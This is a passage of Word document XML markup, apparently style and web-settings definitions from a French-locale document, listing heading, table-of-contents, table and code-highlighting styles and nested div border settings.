    <w:unhideWhenUsed/>
    <w:rsid w:val="0042394C"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0042394C"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre4Car">
    <w:name w:val="Titre 4 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A218CF"/>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3B4286"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre2Car">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="006A6E3A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sansinterligne">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E324A2"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008374F0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC48DD"/>
    <w:pPr>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Numrodepage">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009D6C8B"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FirstParagraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="Corpsdetexte"/>
    <w:next w:val="Corpsdetexte"/>
    <w:qFormat/>
    <w:rsid w:val="00016455"/>
    <w:pPr>
      <w:spacing w:before="180" w:after="180"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Compact">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="Corpsdetexte"/>
    <w:qFormat/>
    <w:rsid w:val="00065753"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimChar">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="SourceCode"/>
    <w:rsid w:val="00016455"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="VerbatimChar"/>
    <w:rsid w:val="00016455"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Corpsdetexte">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CorpsdetexteCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00016455"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CorpsdetexteCar">
    <w:name w:val="Corps de texte Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Corpsdetexte"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00016455"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ExtensionTok">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00065753"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AttributeTok">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00065753"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="7D9029"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NormalTok">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00065753"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTok">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="004F2542"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EF25E5"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>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table" w:styleId="TableauGrille5Fonc-Accentuation1">
    <w:name w:val="Grid Table 5 Dark Accent 1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="00EF25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Liste3-Accentuation1">
    <w:name w:val="List Table 3 Accent 1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="48"/>
    <w:rsid w:val="00BD1B60"/>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eauListe7Couleur-Accentuation1">
    <w:name w:val="List Table 7 Colorful Accent 1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="52"/>
    <w:rsid w:val="00BD1B60"/>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DataTypeTok">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00937CFE"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="902000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="StringTok">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00937CFE"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="OtherTok">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00937CFE"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FunctionTok">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00937CFE"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="06287E"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ErrorTok">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00937CFE"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CodeHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B94188"/>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014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0148E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00074E29"/>
    <w:pPr>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00074E29"/>
    <w:pPr>
      <w:ind w:left="660"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00074E29"/>
    <w:pPr>
      <w:ind w:left="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00074E29"/>
    <w:pPr>
      <w:ind w:left="1100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00074E29"/>
    <w:pPr>
      <w:ind w:left="1320"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00074E29"/>
    <w:pPr>
      <w:ind w:left="1540"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00074E29"/>
    <w:pPr>
      <w:ind w:left="1760"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00E85F8C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00E85F8C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00E85F8C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00E85F8C"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableauGrille4-Accentuation5">
    <w:name w:val="Grid Table 4 Accent 5"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="0061572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1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="0061572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1581">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="3477683">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="31464070">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="34550207">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="73941849">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="75054163">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="104424686">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="173499080">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="332222979">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="227228245">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="577832405">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1528445310">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="14929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3263">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1470517400">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1527059763">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="400638276">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="418718800">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="130569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4666">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1869053717">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2037777400">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="686251246">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1090546336">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="11911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74517">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1197423924">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="127627506">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1649751477">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
